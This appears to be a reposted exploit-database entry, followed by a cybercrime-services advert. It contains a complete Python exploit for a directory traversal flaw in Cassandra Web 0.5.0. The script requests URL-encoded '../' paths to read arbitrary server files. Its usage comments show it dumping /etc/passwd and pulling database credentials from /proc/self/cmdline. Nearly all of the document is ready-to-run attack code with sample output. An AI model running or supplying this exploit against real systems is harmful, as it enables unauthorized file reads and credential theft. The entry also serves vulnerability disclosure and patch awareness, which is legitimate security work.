# Exploit Title: Cassandra Web 0.5.0 - Remote File Read
# Date: 12-28-2020
# Exploit Author: Jeremy Brown
# Vendor Homepage: https://github.com/avalanche123/cassandra-web
# Software Link: https://rubygems.org/gems/cassandra-web/versions/0.5.0
# Version: 0.5.0
# Tested on: Linux

#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# cassmoney.py
#
# Cassandra Web 0.5.0 Remote File Read Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2020
#
# Cassandra Web is vulnerable to directory traversal due to the disabled
# Rack::Protection module. Apache Cassandra credentials are passed via the
# CLI in order for the server to auth to it and provide the web access, so
# they are also one thing that can be captured via the arbitrary file read.
#
# Usage
# > cassmoney.py 10.0.0.5 /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# bin:x:2:2:bin:/bin:/usr/sbin/nologin
# ...
#
# > cassmoney.py 10.0.0.5 /proc/self/cmdline
# /usr/bin/ruby2.7/usr/local/bin/cassandra-web--usernameadmin--passwordP@ssw0rd
#
# (these creds are for auth to the running apache cassandra database server)
#
# Fix
# - fixed in github repo
# - v0.6.0 / ruby-gems when available
# (still recommended to containerize / run this in some sandbox, apparmor, etc)
#

import os
import sys
import argparse
import requests
import urllib.parse

SIGNATURE = 'cassandra.js'

#
# /var/lib/gems/2.7.0/gems/cassandra-web-0.5.0/app/public
#
DT = '../'
DT_NUM = 8

class CassMoney(object):
	def __init__(self, args):
		self.target = args.target
		self.file = args.file
		self.port = args.port
		self.force = args.force
		self.number = args.number

	def run(self):
		target = "http://" + self.target + ':' + str(self.port)

		payload = urllib.parse.quote_plus(DT * self.number + self.file)

		try:
			deskpop = requests.get(target)
		except Exception as error:
			print("Error: %s" % error)
			return -1

		if(SIGNATURE not in deskpop.text and self.force == False):
			print("Target doesn't look like Cassandra Web, aborting...")
			return -1

		try:
			req = requests.get(target + '/' + payload)
		except:
			print("Failed to read %s (perm denied likely)" % self.file)
			return -1

		if(SIGNATURE in req.text):
			print("Failed to read %s (bad path?)" % self.file)
			return -1

		if(len(req.text) == 0):
			print("Server returned nothing for some reason")
			return 0

		print("n%s" % req.text)

		return 0

def arg_parse():
	parser = argparse.ArgumentParser()

	parser.add_argument("target",
						type=str,
						help="Cassandra Web Host")

	parser.add_argument("file",
						type=str,
						help="eg. /etc/passwd, /proc/sched_debug + /proc/<cass-web-pid>/cmdline")

	parser.add_argument("-p",
						"--port",
						type=int,
						default=3000,
						help="Cassandra Web Port")

	parser.add_argument("-f",
						"--force",
						default=False,
						action='store_true',
						help="Run the payload even if server isn't Cassandra Web")

	parser.add_argument("-n",
						"--number",
						type=int,
						default=DT_NUM,
						help="Adjust the number of dot-dot-slash")

	args = parser.parse_args()

	return args

def main():
	args = arg_parse()

	cm = CassMoney(args)

	result = cm.run()

	if(result > 0):
		sys.exit(-1)

if(__name__ == '__main__'):
	main()
            



Source link

Is your business effected by Cyber Crime?

If a cyber crime or cyber attack happens to you, you need to respond quickly. Cyber crime in its several formats such as online identity theft, financial fraud, stalking, bullying, hacking, e-mail fraud, email spoofing, invoice fraud, email scams, banking scam, CEO fraud. Cyber fraud can lead to major disruption and financial disasters. Contact Digitpol’s hotlines or respond to us online.

Digitpol’s Cyber Crime Investigation Unit provides investigative support to victims of cyber crimes. Digitpol is available 24/7. https://digitpol.com/cybercrime-investigation/

Europe +31558448040
UK +44 20 8089 9944
ASIA +85239733884